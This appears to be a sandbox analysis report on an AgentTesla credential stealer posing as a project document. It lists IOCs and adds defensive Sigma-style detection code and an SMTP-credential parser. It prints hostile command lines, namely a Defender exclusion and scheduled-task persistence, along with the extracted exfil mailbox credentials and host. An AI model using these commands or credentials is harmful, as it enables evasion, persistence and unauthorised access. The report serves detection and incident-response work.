Windows Analysis Report: CO DRAFT Al Zaytounah project.exe

Overview

General Information

Sample Name: CO DRAFT Al Zaytounah project.exe
Analysis ID: 532717
MD5: 80cec5a926b23b289405700083013293
SHA1: fbe4b963e5247b52a42ef7485fc2006a77ecbe3a
SHA256: 556b249f8b149348daec751c26360cb2cb5abc61a5f067281e14d771a4817086
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Classification label: mal100.troj.spyw.evad.winEXE@9/9@1/1

Process Tree

  • System is w10x64
  • CO DRAFT Al Zaytounah project.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" MD5: 80CEC5A926B23B289405700083013293)
    • powershell.exe (PID: 6156 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5700 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "milli@emremetal.xyz", "Password": "TB@h;x2zl*5c", "Host": "server126.web-hosting.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(15 entries in total; only the first 5 are reproduced here)

Unpacked PEs

Source | Rule | Description | Author
8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(16 entries in total; only the first 5 are reproduced here)

Sigma Overview

System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" , ParentImage: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe, ParentProcessId: 6960, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp, ProcessId: 5700
Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" , ParentImage: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe, ParentProcessId: 6960, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, ProcessId: 6156
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe" , ParentImage: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe, ParentProcessId: 6960, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe, ProcessId: 6156
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132829331607808173.6156.DefaultAppDomain.powershell
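The two process-creation matches above reduce to command-line checks that can be re-run over any process telemetry (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled). What follows is an added example and not Joe Sandbox or Sigma project code: two rule functions named after the rules that fired, evaluated over constructed event records that copy the command lines from the Process Tree (the surrounding quotes, which the report's rendering trimmed, are restored), plus one benign control event.

```python
"""Sigma-style checks for the two process-creation patterns in this report:
a PowerShell Defender exclusion and a scheduled task created from an XML file
in the user's Temp directory. Added example, not Joe Sandbox or Sigma code;
the event records are constructed to mirror the report's Process Tree."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    pid: int
    parent_pid: int


# Constructed events: the first two copy the command lines observed in the
# sandbox (PIDs 6156 and 5700, parent 6960); the third is a benign control.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe"',
        parent_image=r"C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe",
        pid=6156, parent_pid=6960),
    ProcessEvent(
        image=r"C:\Windows\SysWOW64\schtasks.exe",
        command_line=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp"',
        parent_image=r"C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe",
        pid=5700, parent_pid=6960),
    ProcessEvent(  # benign control: a task created from a managed XML file
        image=r"C:\Windows\System32\schtasks.exe",
        command_line=r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"',
        parent_image=r"C:\Windows\System32\cmd.exe",
        pid=4100, parent_pid=4000),
]

# Sigma string matching is case-insensitive, so every pattern uses re.I.
_EXCLUSION_CMDLET = re.compile(r"\bAdd-MpPreference\b", re.I)
_EXCLUSION_PARAM = re.compile(r"-Exclusion(Path|Extension|Process)\b", re.I)
_TEMP_XML = re.compile(r'/XML\s+"?[^"]*\\AppData\\Local\\Temp\\', re.I)


def rule_powershell_defender_exclusion(ev: ProcessEvent) -> bool:
    """Powershell Defender Exclusion: powershell.exe adding any Defender
    exclusion. Excluding the attacker's own dropped file is the tell."""
    return (ev.image.lower().endswith("\\powershell.exe")
            and bool(_EXCLUSION_CMDLET.search(ev.command_line))
            and bool(_EXCLUSION_PARAM.search(ev.command_line)))


def rule_task_from_user_temp(ev: ProcessEvent) -> bool:
    """Suspicious Add Task From User AppData Temp: schtasks /Create whose
    task definition XML lives under <user>\\AppData\\Local\\Temp."""
    return (ev.image.lower().endswith("\\schtasks.exe")
            and "/create" in ev.command_line.lower()
            and bool(_TEMP_XML.search(ev.command_line)))


RULES = {
    "Powershell Defender Exclusion": rule_powershell_defender_exclusion,
    "Suspicious Add Task From User AppData Temp": rule_task_from_user_temp,
}


def evaluate(events):
    """Return {rule_title: [pid, ...]} for every event that matched a rule."""
    hits = {}
    for ev in events:
        for title, rule in RULES.items():
            if rule(ev):
                hits.setdefault(title, []).append(ev.pid)
    return hits


def exclusion_paths(events):
    """Pull the excluded path out of matching PowerShell events, so the
    responder knows exactly which file Defender was told to ignore."""
    paths = []
    for ev in events:
        if rule_powershell_defender_exclusion(ev):
            m = re.search(r'-ExclusionPath\s+"?([^"]+)"?', ev.command_line, re.I)
            if m:
                paths.append(m.group(1).strip())
    return paths


if __name__ == "__main__":
    for title, pids in evaluate(SAMPLE_EVENTS).items():
        print(f"{title}: PIDs {pids}")
    print("Defender exclusions added:", exclusion_paths(SAMPLE_EVENTS))
```

The checks deliberately do not depend on the excluded file name or the task name, both of which this sample randomises (eyjBzJU); the stable signals are the Add-MpPreference cmdlet carrying an -Exclusion* parameter, and schtasks /Create reading its task definition from the user's Temp directory. Where administrators legitimately script exclusions, add a parent-image allow-list rather than loosening the patterns.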

                      Jbx Signature Overview


                      AV Detection:

Found malware configuration
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "milli@emremetal.xyz", "Password": "TB@h;x2zl*5c", "Host": "server126.web-hosting.com"}
Multi AV Scanner detection for submitted file
Source: CO DRAFT Al Zaytounah project.exe | Virustotal: Detection: 25%
Source: CO DRAFT Al Zaytounah project.exe | ReversingLabs: Detection: 31%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\eyjBzJU.exe | ReversingLabs: Detection: 31%
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.2.CO DRAFT Al Zaytounah project.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49803 -> 198.54.126.165:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49804 -> 198.54.126.165:587
Source: Joe Sandbox View | IP Address: 198.54.126.165
Source: global traffic | TCP traffic: 192.168.2.4:49803 -> 198.54.126.165:587
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | String found in binary or memory: http://CjhhBN.com
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmp | String found in binary or memory: http://server126.web-hosting.com
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931681747.0000000002E9D000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931642150.0000000002E89000.00000004.00000001.sdmp | String found in binary or memory: https://KXS9NVa7QJoby.org
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | String found in binary or memory: https://KXS9NVa7QJoby.org$
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%$
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: server126.web-hosting.com
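The Snort alert and the extracted configuration describe the same event from two sides: the sample resolved server126.web-hosting.com, connected to 198.54.126.165:587 and authenticated to the attacker's mailbox. A content signature can only fire on a session that is not TLS-protected, so when a capture is available the same credentials and the exfil recipient can be read back out of the stream itself; .NET's SmtpClient, which AgentTesla builds on, authenticates with AUTH LOGIN, and that is only base64. The following is an added example, not Joe Sandbox code and not the Snort rule. CLIENT_STREAM is a constructed client-side transcript that reuses the username and password from the extracted config; the EHLO name, the recipient address and the message body are placeholders, and a second constructed stream shows the AUTH PLAIN form so the parser covers both mechanisms.

```python
"""Recover the mailbox login and the exfil recipient from the client half of
a cleartext SMTP session, the traffic the Snort alert above fired on. Added
example, not Joe Sandbox code and not the Snort rule. CLIENT_STREAM is a
constructed transcript that reuses the username and password from the
extracted config; EHLO name, recipient and body are placeholders."""
import base64
import re

CLIENT_STREAM = b"\r\n".join([
    b"EHLO user-PC",
    b"AUTH LOGIN",
    base64.b64encode(b"milli@emremetal.xyz"),   # answer to the "Username:" prompt
    base64.b64encode(b"TB@h;x2zl*5c"),          # answer to the "Password:" prompt
    b"MAIL FROM:<milli@emremetal.xyz>",
    b"RCPT TO:<milli@emremetal.xyz>",           # assumed: stealer mails itself
    b"DATA",
    b"Subject: user-PC report",
    b"",
    b"(placeholder body)",
    b".",
    b"QUIT",
]) + b"\r\n"

# Same parser, other mechanism: AUTH PLAIN carries \0user\0pass in one blob.
CLIENT_STREAM_PLAIN = b"\r\n".join([
    b"EHLO host",
    b"AUTH PLAIN " + base64.b64encode(b"\0alice@example.org\0hunter2"),
    b"MAIL FROM:<alice@example.org>",
    b"RCPT TO:<drop@example.org>",
    b"QUIT",
]) + b"\r\n"


def _b64(token: str) -> str:
    return base64.b64decode(token, validate=True).decode("utf-8", "replace")


def _addr(line: str) -> str:
    m = re.search(r"<([^>]*)>", line)
    return m.group(1) if m else line.split(":", 1)[1].strip()


def parse_smtp_client(stream: bytes) -> dict:
    """Walk the client commands in order. AUTH LOGIN's username and password
    are the two lines after the command (one, if the username rides along as
    an initial response); AUTH PLAIN is decoded and split on NUL."""
    lines = stream.decode("latin-1").split("\r\n")
    out = {"auth": None, "username": None, "password": None,
           "mail_from": None, "rcpt_to": [], "subject": None}
    i, in_data = 0, False
    while i < len(lines):
        line, up = lines[i], lines[i].upper()
        if in_data:                              # message body until lone "."
            if line == ".":
                in_data = False
            elif up.startswith("SUBJECT:") and out["subject"] is None:
                out["subject"] = line[len("Subject:"):].strip()
        elif up.startswith("AUTH LOGIN"):
            out["auth"] = "LOGIN"
            parts = line.split()
            if len(parts) >= 3:                  # AUTH LOGIN <base64 user>
                out["username"] = _b64(parts[2])
                i += 1
            else:                                # username is the next line
                out["username"] = _b64(lines[i + 1])
                i += 2
            out["password"] = _b64(lines[i])
        elif up.startswith("AUTH PLAIN"):
            out["auth"] = "PLAIN"
            parts = line.split()
            if len(parts) < 3:                   # blob sent on the next line
                i += 1
            blob = parts[2] if len(parts) >= 3 else lines[i]
            _authzid, user, pw = base64.b64decode(blob, validate=True).split(b"\0", 2)
            out["username"], out["password"] = user.decode(), pw.decode()
        elif up.startswith("MAIL FROM:"):
            out["mail_from"] = _addr(line)
        elif up.startswith("RCPT TO:"):
            out["rcpt_to"].append(_addr(line))
        elif up == "DATA":
            in_data = True
        i += 1
    return out


if __name__ == "__main__":
    for name, stream in (("LOGIN session", CLIENT_STREAM),
                         ("PLAIN session", CLIENT_STREAM_PLAIN)):
        print(name, parse_smtp_client(stream))
```

Feed it the client-to-server direction of the session (for example the output of tshark's follow-stream on the 49803 -> 587 flow). If the client negotiated STARTTLS after EHLO, nothing after that command is readable and the config extractor's output is the only source of the credentials. Two things the recovered data is for: the RCPT TO mailbox is the attacker's collection point and belongs in an abuse report to the hosting provider, and the message bodies list exactly which victim credentials were already sent, which decides what has to be rotated.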

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.680792720.0000000001660000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary:

.NET source code contains very large array initializations
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, <PrivateImplementationDetails>{BA29DE82-4BC0-43FC-84DD-78B6F3A69E9D}/B1C3D179-E03B-4108-B4C7-1C8785639810.cs | Large array initialization: .cctor: array initializer size 11963
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, <PrivateImplementationDetails>{BA29DE82-4BC0-43FC-84DD-78B6F3A69E9D}/B1C3D179-E03B-4108-B4C7-1C8785639810.cs | Large array initialization: .cctor: array initializer size 11963
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, <PrivateImplementationDetails>{BA29DE82-4BC0-43FC-84DD-78B6F3A69E9D}/B1C3D179-E03B-4108-B4C7-1C8785639810.cs | Large array initialization: .cctor: array initializer size 11963
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 0_2_0186C5B4
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 0_2_0186E913
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 0_2_0186E918
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCBlsREajdILFHjttXQQvPBUPXWSdA.exe4 vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.685764970.00000000065B0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.680527861.0000000000F38000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000003.665055094.0000000001739000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.680792720.0000000001660000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCBlsREajdILFHjttXQQvPBUPXWSdA.exe4 vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678239698.0000000000778000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.929965429.0000000000E2A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCBlsREajdILFHjttXQQvPBUPXWSdA.exe4 vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.929638772.0000000000B38000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe | Binary or memory string: OriginalFilenameIdentifierAuthori.exe4 vs CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eyjBzJU.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: eyjBzJU.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CO DRAFT Al Zaytounah project.exe | Virustotal: Detection: 25%
Source: CO DRAFT Al Zaytounah project.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File read: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe"
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process created: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 times)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File created: C:\Users\user\AppData\Roaming\eyjBzJU.exe
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File created: C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/9@1/1
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Mutant created: \Sessions\1\BaseNamedObjects\oNRWzrcwgOKXibQlcjDPRoQyXB
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_01
